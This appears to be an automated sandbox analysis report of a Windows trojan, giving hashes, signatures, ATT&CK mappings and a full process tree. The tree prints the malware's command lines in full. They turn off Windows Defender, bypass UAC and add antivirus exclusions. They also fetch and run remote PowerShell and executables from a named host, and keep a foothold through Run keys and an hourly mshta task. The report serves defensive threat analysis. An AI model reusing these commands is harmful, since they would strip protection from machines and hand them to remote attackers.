3a5480d5ea288089567f338055545b05c195f8eaf350ec4698ca6cb03b91f787

General

Target

3a5480d5ea288089567f338055545b05c195f8eaf350ec4698ca6cb03b91f787.bin.exe
Size

92KB
MD5

f90879110d316ff87567e5090b32099c
SHA1

849e5fb60e581637288613f694c50df4c71c3692
SHA256

3a5480d5ea288089567f338055545b05c195f8eaf350ec4698ca6cb03b91f787
SHA512

1cb1e57bec68f91a4bf81010d75826bf56d6366547e7950129ea42e2c206dbe09efa1de8f2d3160ca28a5c3a389c1134d73349d2dbe170285443340cf2a91d13

Score

10^/10

evasion persistence trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://hpsj.firewall-gateway.net:80/hpjs.php

Extracted

Language

ps1

Source

URLs

exe.dropper

https://is.gd/NJZZ9I

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
UAC bypass 3 TTPs
evasion trojan

Bypass User Account Control
T1088

Disabling Security Tools
T1089

Modify Registry
T1112

Blocklisted process makes network request 32 IoCs

Processes:

powershell.exepowershell.exe

flow	pid	process
18	2148	powershell.exe
19	3872	powershell.exe
21	2148	powershell.exe
25	3872	powershell.exe
26	3872	powershell.exe
28	3872	powershell.exe
31	3872	powershell.exe
33	3872	powershell.exe
34	3872	powershell.exe
35	3872	powershell.exe
36	3872	powershell.exe
37	3872	powershell.exe
38	3872	powershell.exe
39	3872	powershell.exe
40	3872	powershell.exe
43	3872	powershell.exe
44	3872	powershell.exe
46	3872	powershell.exe
47	3872	powershell.exe
48	3872	powershell.exe
49	3872	powershell.exe
50	3872	powershell.exe
51	3872	powershell.exe
52	3872	powershell.exe
53	3872	powershell.exe
54	3872	powershell.exe
55	3872	powershell.exe
57	3872	powershell.exe
58	3872	powershell.exe
59	3872	powershell.exe
60	3872	powershell.exe
61	3872	powershell.exe

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

reg.exereg.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run\#OneDrive1z = "cmd /c powershell -w hidden \"Add-Type -AssemblyName System.Core;IEX (New-Object Net.WebClient).DownloadString('http://hpsj.firewall-gateway.net:80/hpjs.php');\""	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run\#Qyk = "C:\\Users\\Public\\Libraries\\Qyk.exe"	reg.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

4364 2148 WerFault.exe powershell.exe
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exe

pid process

4152 schtasks.exe
4264 schtasks.exe
Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

3112 reg.exe

pid	pid_target	process	target process
4364	2148	WerFault.exe	powershell.exe

pid	process
4152	schtasks.exe
4264	schtasks.exe

pid	process
3112	reg.exe

Suspicious behavior: EnumeratesProcesses 38 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeWerFault.exe

pid	process
3872	powershell.exe
3156	powershell.exe
2252	powershell.exe
2148	powershell.exe
2928	powershell.exe
2928	powershell.exe
3872	powershell.exe
772	powershell.exe
3156	powershell.exe
2252	powershell.exe
2148	powershell.exe
3872	powershell.exe
2148	powershell.exe
2252	powershell.exe
3156	powershell.exe
2928	powershell.exe
772	powershell.exe
772	powershell.exe
4364	WerFault.exe
4364	WerFault.exe
4364	WerFault.exe
4364	WerFault.exe
4364	WerFault.exe
4364	WerFault.exe
4364	WerFault.exe
4364	WerFault.exe
4364	WerFault.exe
4364	WerFault.exe
4364	WerFault.exe
4364	WerFault.exe
4364	WerFault.exe
4364	WerFault.exe
4364	WerFault.exe
4364	WerFault.exe
3872	powershell.exe
3872	powershell.exe
3872	powershell.exe
3872	powershell.exe

Suspicious use of AdjustPrivilegeToken 49 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeWerFault.exe

description	pid	process
Token: SeDebugPrivilege	3872	powershell.exe
Token: SeDebugPrivilege	2252	powershell.exe
Token: SeDebugPrivilege	3156	powershell.exe
Token: SeDebugPrivilege	2148	powershell.exe
Token: SeDebugPrivilege	2928	powershell.exe
Token: SeDebugPrivilege	772	powershell.exe
Token: SeIncreaseQuotaPrivilege	2252	powershell.exe
Token: SeSecurityPrivilege	2252	powershell.exe
Token: SeTakeOwnershipPrivilege	2252	powershell.exe
Token: SeLoadDriverPrivilege	2252	powershell.exe
Token: SeSystemProfilePrivilege	2252	powershell.exe
Token: SeSystemtimePrivilege	2252	powershell.exe
Token: SeProfSingleProcessPrivilege	2252	powershell.exe
Token: SeIncBasePriorityPrivilege	2252	powershell.exe
Token: SeCreatePagefilePrivilege	2252	powershell.exe
Token: SeBackupPrivilege	2252	powershell.exe
Token: SeRestorePrivilege	2252	powershell.exe
Token: SeShutdownPrivilege	2252	powershell.exe
Token: SeDebugPrivilege	2252	powershell.exe
Token: SeSystemEnvironmentPrivilege	2252	powershell.exe
Token: SeRemoteShutdownPrivilege	2252	powershell.exe
Token: SeUndockPrivilege	2252	powershell.exe
Token: SeManageVolumePrivilege	2252	powershell.exe
Token: 33	2252	powershell.exe
Token: 34	2252	powershell.exe
Token: 35	2252	powershell.exe
Token: 36	2252	powershell.exe
Token: SeIncreaseQuotaPrivilege	3156	powershell.exe
Token: SeSecurityPrivilege	3156	powershell.exe
Token: SeTakeOwnershipPrivilege	3156	powershell.exe
Token: SeLoadDriverPrivilege	3156	powershell.exe
Token: SeSystemProfilePrivilege	3156	powershell.exe
Token: SeSystemtimePrivilege	3156	powershell.exe
Token: SeProfSingleProcessPrivilege	3156	powershell.exe
Token: SeIncBasePriorityPrivilege	3156	powershell.exe
Token: SeCreatePagefilePrivilege	3156	powershell.exe
Token: SeBackupPrivilege	3156	powershell.exe
Token: SeRestorePrivilege	3156	powershell.exe
Token: SeShutdownPrivilege	3156	powershell.exe
Token: SeDebugPrivilege	3156	powershell.exe
Token: SeSystemEnvironmentPrivilege	3156	powershell.exe
Token: SeRemoteShutdownPrivilege	3156	powershell.exe
Token: SeUndockPrivilege	3156	powershell.exe
Token: SeManageVolumePrivilege	3156	powershell.exe
Token: 33	3156	powershell.exe
Token: 34	3156	powershell.exe
Token: 35	3156	powershell.exe
Token: 36	3156	powershell.exe
Token: SeDebugPrivilege	4364	WerFault.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

3a5480d5ea288089567f338055545b05c195f8eaf350ec4698ca6cb03b91f787.bin.execmd.exe

description	pid	process	target process
PID 4068 wrote to memory of 3552	4068	3a5480d5ea288089567f338055545b05c195f8eaf350ec4698ca6cb03b91f787.bin.exe	cmd.exe
PID 4068 wrote to memory of 3552	4068	3a5480d5ea288089567f338055545b05c195f8eaf350ec4698ca6cb03b91f787.bin.exe	cmd.exe
PID 3552 wrote to memory of 3020	3552	cmd.exe	reg.exe
PID 3552 wrote to memory of 3020	3552	cmd.exe	reg.exe
PID 3552 wrote to memory of 748	3552	cmd.exe	reg.exe
PID 3552 wrote to memory of 748	3552	cmd.exe	reg.exe
PID 3552 wrote to memory of 2072	3552	cmd.exe	reg.exe
PID 3552 wrote to memory of 2072	3552	cmd.exe	reg.exe
PID 3552 wrote to memory of 4012	3552	cmd.exe	reg.exe
PID 3552 wrote to memory of 4012	3552	cmd.exe	reg.exe
PID 3552 wrote to memory of 696	3552	cmd.exe	reg.exe
PID 3552 wrote to memory of 696	3552	cmd.exe	reg.exe
PID 3552 wrote to memory of 196	3552	cmd.exe	reg.exe
PID 3552 wrote to memory of 196	3552	cmd.exe	reg.exe
PID 3552 wrote to memory of 3768	3552	cmd.exe	reg.exe
PID 3552 wrote to memory of 3768	3552	cmd.exe	reg.exe
PID 3552 wrote to memory of 1100	3552	cmd.exe	reg.exe
PID 3552 wrote to memory of 1100	3552	cmd.exe	reg.exe
PID 3552 wrote to memory of 1364	3552	cmd.exe	reg.exe
PID 3552 wrote to memory of 1364	3552	cmd.exe	reg.exe
PID 3552 wrote to memory of 3944	3552	cmd.exe	reg.exe
PID 3552 wrote to memory of 3944	3552	cmd.exe	reg.exe
PID 3552 wrote to memory of 2504	3552	cmd.exe	reg.exe
PID 3552 wrote to memory of 2504	3552	cmd.exe	reg.exe
PID 3552 wrote to memory of 420	3552	cmd.exe	reg.exe
PID 3552 wrote to memory of 420	3552	cmd.exe	reg.exe
PID 3552 wrote to memory of 3280	3552	cmd.exe	reg.exe
PID 3552 wrote to memory of 3280	3552	cmd.exe	reg.exe
PID 3552 wrote to memory of 2652	3552	cmd.exe	reg.exe
PID 3552 wrote to memory of 2652	3552	cmd.exe	reg.exe
PID 3552 wrote to memory of 2576	3552	cmd.exe	reg.exe
PID 3552 wrote to memory of 2576	3552	cmd.exe	reg.exe
PID 3552 wrote to memory of 1384	3552	cmd.exe	schtasks.exe
PID 3552 wrote to memory of 1384	3552	cmd.exe	schtasks.exe
PID 3552 wrote to memory of 2188	3552	cmd.exe	schtasks.exe
PID 3552 wrote to memory of 2188	3552	cmd.exe	schtasks.exe
PID 3552 wrote to memory of 3492	3552	cmd.exe	schtasks.exe
PID 3552 wrote to memory of 3492	3552	cmd.exe	schtasks.exe
PID 3552 wrote to memory of 4036	3552	cmd.exe	schtasks.exe
PID 3552 wrote to memory of 4036	3552	cmd.exe	schtasks.exe
PID 3552 wrote to memory of 3988	3552	cmd.exe	schtasks.exe
PID 3552 wrote to memory of 3988	3552	cmd.exe	schtasks.exe
PID 3552 wrote to memory of 2520	3552	cmd.exe	reg.exe
PID 3552 wrote to memory of 2520	3552	cmd.exe	reg.exe
PID 3552 wrote to memory of 2632	3552	cmd.exe	reg.exe
PID 3552 wrote to memory of 2632	3552	cmd.exe	reg.exe
PID 3552 wrote to memory of 400	3552	cmd.exe	reg.exe
PID 3552 wrote to memory of 400	3552	cmd.exe	reg.exe
PID 3552 wrote to memory of 2672	3552	cmd.exe	reg.exe
PID 3552 wrote to memory of 2672	3552	cmd.exe	reg.exe
PID 3552 wrote to memory of 4052	3552	cmd.exe	reg.exe
PID 3552 wrote to memory of 4052	3552	cmd.exe	reg.exe
PID 3552 wrote to memory of 636	3552	cmd.exe	reg.exe
PID 3552 wrote to memory of 636	3552	cmd.exe	reg.exe
PID 3552 wrote to memory of 696	3552	cmd.exe	reg.exe
PID 3552 wrote to memory of 696	3552	cmd.exe	reg.exe
PID 3552 wrote to memory of 196	3552	cmd.exe	reg.exe
PID 3552 wrote to memory of 196	3552	cmd.exe	reg.exe
PID 3552 wrote to memory of 3768	3552	cmd.exe	reg.exe
PID 3552 wrote to memory of 3768	3552	cmd.exe	reg.exe
PID 3552 wrote to memory of 1508	3552	cmd.exe	reg.exe
PID 3552 wrote to memory of 1508	3552	cmd.exe	reg.exe
PID 3552 wrote to memory of 3412	3552	cmd.exe	reg.exe
PID 3552 wrote to memory of 3412	3552	cmd.exe	reg.exe

C:\Users\Admin\AppData\Local\Temp\3a5480d5ea288089567f338055545b05c195f8eaf350ec4698ca6cb03b91f787.bin.exe
"C:\Users\Admin\AppData\Local\Temp\3a5480d5ea288089567f338055545b05c195f8eaf350ec4698ca6cb03b91f787.bin.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4068

C:\Windows\System32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\2DDC.tmp\2DDD.tmp\2DED.bat C:\Users\Admin\AppData\Local\Temp\3a5480d5ea288089567f338055545b05c195f8eaf350ec4698ca6cb03b91f787.bin.exe"
2⤵
- Suspicious use of WriteProcessMemory
PID:3552

C:\Windows\system32\reg.exe
reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
3⤵
PID:3020

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
3⤵
PID:748

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
3⤵
PID:2072

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
3⤵
PID:4012

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
3⤵
PID:696

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
3⤵
PID:196

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
3⤵
PID:3768

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
3⤵
PID:1100

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
3⤵
PID:1364

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
3⤵
PID:3944

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
3⤵
PID:2504

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
3⤵
PID:420

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
3⤵
PID:3280

C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
3⤵
PID:2652

C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
3⤵
PID:2576

C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
3⤵
PID:1384

C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
3⤵
PID:2188

C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
3⤵
PID:3492

C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
3⤵
PID:4036

C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
3⤵
PID:3988

C:\Windows\system32\reg.exe
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
3⤵
PID:2520

C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
3⤵
PID:2632

C:\Windows\system32\reg.exe
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
3⤵
PID:400

C:\Windows\system32\reg.exe
reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
3⤵
PID:2672

C:\Windows\system32\reg.exe
reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
3⤵
PID:4052

C:\Windows\system32\reg.exe
reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
3⤵
PID:636

C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
3⤵
PID:696

C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
3⤵
PID:196

C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
3⤵
PID:3768

C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
3⤵
PID:1508

C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
3⤵
PID:3412

C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
3⤵
PID:3916

C:\Windows\system32\reg.exe
reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
3⤵
- Modifies registry key
PID:3112

C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "#OneDrive1z" /t REG_SZ /d "cmd /c powershell -w hidden \"Add-Type -AssemblyName System.Core;IEX (New-Object Net.WebClient).DownloadString('http://hpsj.firewall-gateway.net:80/hpjs.php');\"" /f
3⤵
- Adds Run key to start application
PID:2500

C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "#Qyk" /t REG_SZ /d "C:\Users\Public\Libraries\Qyk.exe
3⤵
- Adds Run key to start application
PID:1152

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ExclusionPath "C:" -FORCE
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3156

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ExclusionPath "C:\Users" -FORCE
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2252

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -w hidden "Add-Type -AssemblyName System.Core;IEX (New-Object Net.WebClient).DownloadString('http://hpsj.firewall-gateway.net:80/hpjs.php');"
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3872

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden -command "IEX (New-Object Net.WebClient).DownloadFile('https://is.gd/NJZZ9I','C:\Users\Public\Libraries\Qyk.exe');" C:\Users\Public\Libraries\Qyk.exe
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2148

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 2148 -s 2492
4⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4364

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -noprofile -noexit -c Invoke-Command -ScriptBlock { schtasks /create /TN AutomaticChromeUpdaterz /TR 'mshta http://hpsj.firewall-gateway.net:8080/MicrosoftUpdate' /SC minute /mo 60}
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2928

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /create /TN AutomaticChromeUpdaterz /TR "mshta http://hpsj.firewall-gateway.net:8080/MicrosoftUpdate" /SC minute /mo 60
4⤵
- Creates scheduled task(s)
PID:4152

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -noprofile -noexit -c Invoke-Command -ScriptBlock { schtasks /create /TN Qyk /TR 'C:\Users\Public\Libraries\Qyk.exe' /SC minute /mo 60}
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:772

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /create /TN Qyk /TR C:\Users\Public\Libraries\Qyk.exe /SC minute /mo 60
4⤵
- Creates scheduled task(s)
PID:4264

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

1

T1053

Persistence

Modify Existing Service

1

T1031

Registry Run Keys / Startup Folder

1

T1060

Scheduled Task

1

T1053

Privilege Escalation

Bypass User Account Control

1

T1088

Scheduled Task

1

T1053

Defense Evasion

Modify Registry

4

T1112

Disabling Security Tools

2

T1089

Bypass User Account Control

1

T1088

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
MD5
ad5cd538ca58cb28ede39c108acb5785

SHA1
1ae910026f3dbe90ed025e9e96ead2b5399be877

SHA256
c9e6cb04d6c893458d5a7e12eb575cf97c3172f5e312b1f63a667cbbc5f0c033

SHA512
c066c5d9b276a68fa636647bb29aea05bfa2292217bc77f5324d9c1d93117772ee8277e1f7cff91ec8d6b7c05ca078f929cecfdbb09582522a9067f54740af13

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
MD5
69d4edd38dda648fb3412a9abd76c318

SHA1
33d707cc434696d9741d27766bfc31962578b448

SHA256
66844455e528953ede71a42b65162749e5f43fa054ea9ad6a343f16275259964

SHA512
2c989a1137a61ae07f60565ad8c1a862e440fe66726354e43fe6698bd834b43f8bcb9116500b5176754ae11267914c7182db245f75fa790433da37662e520934

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
e1d636bb08c19e0edec4c5b0547e70eb

SHA1
3336418c29d1a4d11eb5de5585f92a7512f4f381

SHA256
e550797ca4f2ff5c9bc64399a24a2a43911c40d08a2bda14fab7cc81eac9ffc3

SHA512
eca84414e182318e42d61b9c001169e461674713a789448d4263e2b20fe99366cd227cff727678d23e66b1d94619cbd507c7cf12c5170e3f04f132fe24236d56

Download Submit
C:\Users\Admin\AppData\Local\Temp\2DDC.tmp\2DDD.tmp\2DED.bat
MD5
3e332621638a8a5863723c13c5eec977

SHA1
e544ad5f6f62a6f2ade41f007919a1e09ec3af75

SHA256
4fb1c29088ff80ee7febdcc641ba6dade6aa30259bf1b8a22a0edb86d887f1fb

SHA512
5aa87c1e0904e9c33381be8c07723d5c181ecdcce6a1529aa2738b52b205699ee5124a1d15c50021637e272111a5b27a5ca6b52e7c65387b3329688898cc0fb7

Download Submit
memory/196-31-0x0000000000000000-mapping.dmp

Download
memory/196-9-0x0000000000000000-mapping.dmp

Download
memory/400-26-0x0000000000000000-mapping.dmp

Download
memory/420-15-0x0000000000000000-mapping.dmp

Download
memory/636-29-0x0000000000000000-mapping.dmp

Download
memory/696-8-0x0000000000000000-mapping.dmp

Download
memory/696-30-0x0000000000000000-mapping.dmp

Download
memory/748-5-0x0000000000000000-mapping.dmp

Download
memory/772-52-0x0000000000000000-mapping.dmp

Download
memory/772-72-0x0000015C78FC0000-0x0000015C78FC2000-memory.dmp

Filesize
8KB

Download
memory/772-53-0x00007FFED86C0000-0x00007FFED90AC000-memory.dmp

Filesize
9.9MB

Download
memory/772-73-0x0000015C78FC3000-0x0000015C78FC5000-memory.dmp

Filesize
8KB

Download
memory/1100-11-0x0000000000000000-mapping.dmp

Download
memory/1152-38-0x0000000000000000-mapping.dmp

Download
memory/1364-12-0x0000000000000000-mapping.dmp

Download
memory/1384-19-0x0000000000000000-mapping.dmp

Download
memory/1508-33-0x0000000000000000-mapping.dmp

Download
memory/2072-6-0x0000000000000000-mapping.dmp

Download
memory/2148-80-0x00000186341A6000-0x00000186341A8000-memory.dmp

Filesize
8KB

Download
memory/2148-64-0x00000186341A0000-0x00000186341A2000-memory.dmp

Filesize
8KB

Download
memory/2148-65-0x00000186341A3000-0x00000186341A5000-memory.dmp

Filesize
8KB

Download
memory/2148-45-0x0000000000000000-mapping.dmp

Download
memory/2148-47-0x00007FFED86C0000-0x00007FFED90AC000-memory.dmp

Filesize
9.9MB

Download
memory/2188-20-0x0000000000000000-mapping.dmp

Download
memory/2252-58-0x00000191DFC00000-0x00000191DFC02000-memory.dmp

Filesize
8KB

Download
memory/2252-85-0x00000191DFC08000-0x00000191DFC09000-memory.dmp

Filesize
4KB

Download
memory/2252-43-0x00007FFED86C0000-0x00007FFED90AC000-memory.dmp

Filesize
9.9MB

Download
memory/2252-59-0x00000191DFC03000-0x00000191DFC05000-memory.dmp

Filesize
8KB

Download
memory/2252-40-0x0000000000000000-mapping.dmp

Download
memory/2252-78-0x00000191DFC06000-0x00000191DFC08000-memory.dmp

Filesize
8KB

Download
memory/2500-37-0x0000000000000000-mapping.dmp

Download
memory/2504-14-0x0000000000000000-mapping.dmp

Download
memory/2520-24-0x0000000000000000-mapping.dmp

Download
memory/2576-18-0x0000000000000000-mapping.dmp

Download
memory/2632-25-0x0000000000000000-mapping.dmp

Download
memory/2652-17-0x0000000000000000-mapping.dmp

Download
memory/2672-27-0x0000000000000000-mapping.dmp

Download
memory/2928-66-0x0000014C1B140000-0x0000014C1B142000-memory.dmp

Filesize
8KB

Download
memory/2928-70-0x0000014C1B143000-0x0000014C1B145000-memory.dmp

Filesize
8KB

Download
memory/2928-46-0x0000000000000000-mapping.dmp

Download
memory/2928-67-0x0000014C1B0E0000-0x0000014C1B0E1000-memory.dmp

Filesize
4KB

Download
memory/2928-48-0x00007FFED86C0000-0x00007FFED90AC000-memory.dmp

Filesize
9.9MB

Download
memory/3020-4-0x0000000000000000-mapping.dmp

Download
memory/3112-36-0x0000000000000000-mapping.dmp

Download
memory/3156-39-0x0000000000000000-mapping.dmp

Download
memory/3156-56-0x000001B565160000-0x000001B565162000-memory.dmp

Filesize
8KB

Download
memory/3156-57-0x000001B565163000-0x000001B565165000-memory.dmp

Filesize
8KB

Download
memory/3156-84-0x000001B565168000-0x000001B565169000-memory.dmp

Filesize
4KB

Download
memory/3156-79-0x000001B565166000-0x000001B565168000-memory.dmp

Filesize
8KB

Download
memory/3156-42-0x00007FFED86C0000-0x00007FFED90AC000-memory.dmp

Filesize
9.9MB

Download
memory/3280-16-0x0000000000000000-mapping.dmp

Download
memory/3412-34-0x0000000000000000-mapping.dmp

Download
memory/3492-21-0x0000000000000000-mapping.dmp

Download
memory/3552-2-0x0000000000000000-mapping.dmp

Download
memory/3768-32-0x0000000000000000-mapping.dmp

Download
memory/3768-10-0x0000000000000000-mapping.dmp

Download
memory/3872-62-0x000001EF2B7E0000-0x000001EF2B7E2000-memory.dmp

Filesize
8KB

Download
memory/3872-60-0x000001EF2DAA0000-0x000001EF2DAA1000-memory.dmp

Filesize
4KB

Download
memory/3872-41-0x0000000000000000-mapping.dmp

Download
memory/3872-44-0x00007FFED86C0000-0x00007FFED90AC000-memory.dmp

Filesize
9.9MB

Download
memory/3872-81-0x000001EF2B7E6000-0x000001EF2B7E8000-memory.dmp

Filesize
8KB

Download
memory/3872-63-0x000001EF2B7E3000-0x000001EF2B7E5000-memory.dmp

Filesize
8KB

Download
memory/3872-49-0x000001EF2D8F0000-0x000001EF2D8F1000-memory.dmp

Filesize
4KB

Download
memory/3916-35-0x0000000000000000-mapping.dmp

Download
memory/3944-13-0x0000000000000000-mapping.dmp

Download
memory/3988-23-0x0000000000000000-mapping.dmp

Download
memory/4012-7-0x0000000000000000-mapping.dmp

Download
memory/4036-22-0x0000000000000000-mapping.dmp

Download
memory/4052-28-0x0000000000000000-mapping.dmp

Download
memory/4152-75-0x0000000000000000-mapping.dmp

Download
memory/4264-82-0x0000000000000000-mapping.dmp

Download
memory/4364-83-0x00000261F6F10000-0x00000261F6F11000-memory.dmp

Filesize
4KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads